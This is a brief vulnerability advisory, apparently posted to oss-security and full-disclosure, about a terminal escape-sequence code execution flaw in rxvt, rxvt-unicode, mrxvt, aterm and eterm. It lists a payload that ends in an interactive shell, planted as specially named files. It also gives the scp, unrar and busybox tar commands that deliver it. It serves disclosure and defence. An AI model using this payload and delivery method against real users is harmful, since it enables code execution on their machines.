(u)rxvt terminal (+bash) remoteish code execution 0day

Version: rxvt 2.7.10, rxvt-unicode 9.22, mrxvt 0.5.4, aterm 1.0.1, eterm 0.9.7
Date: 2021-04-20 (updated 2021-05-20)
Author: def <def@huumeet.info>
Threads: oss-security full-disclosure


Payload (planted as ZZZ/0, ZZZ/1 and/or ZZZ/Z0 in the PoC exploits)

uname -a && id && date && /bin/sh -i

scp -r exploit@server:/backup/ .

unrar x exploit.rar

busybox tar -xvf exploit.tar

Note: GNU tar is not exploitable due to proper escaping of ANSI escape sequences in filenames!